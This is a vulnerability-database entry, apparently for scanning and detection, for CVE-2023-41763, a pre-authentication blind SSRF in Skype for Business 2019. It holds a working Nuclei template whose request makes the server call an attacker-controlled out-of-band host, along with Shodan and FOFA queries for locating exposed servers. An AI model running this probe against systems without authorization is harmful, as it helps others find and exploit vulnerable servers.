CVE-2023-41763: Skype for Business 2019 (SfB) - Blind Server-side Request Forgery

日期: 2025-08-01 | 影响软件: Skype for Business 2019 (SfB) | POC: 已公开

漏洞描述

Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability

PoC代码[已公开]

id: CVE-2023-41763

info:
  name: Skype for Business 2019 (SfB) - Blind Server-side Request Forgery
  author: hateshape
  severity: medium
  description: |
    Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability
  reference:
    - https://frycos.github.io/vulns4free/2022/09/26/skype-audit-part2.html
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-41763
    - https://nvd.nist.gov/vuln/detail/CVE-2023-41763
    - https://github.com/Ostorlab/KEV
    - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-41763
    epss-score: 0.16278
    epss-percentile: 0.94602
    cpe: cpe:2.3:a:microsoft:skype_for_business_server:2015:cumulative_update_13:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: microsoft
    product: skype_for_business_server
    shodan-query:
      - html:"Skype for Business"
      - http.html:"skype for business"
    fofa-query: body="skype for business"
  tags: cve,cve2023,skype,blind-ssrf,oast,ssrf,kev,microsoft,vkev
variables:
  ssrfpayload: "http://{{interactsh-url}}/?id={{rand_base(3)}}%25{1337*1337}#.xx//"

http:
  - raw:
      - |
        GET /lwa/Webpages/LwaClient.aspx?meeturl={{base64(ssrfpayload)}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: body
        words:
          - 'Skype'
# digest: 4a0a00473045022100e2dc2e310afcccc6711ab4f8e7e80fecf5638842a87dfd8755877f41b2442a5f0220520da7fcd456f2dae9554ba0b08db1ef1a0f0f1593ce27fa3e4888ef185b2a67:922c64590222798bb761d5b6d8e72950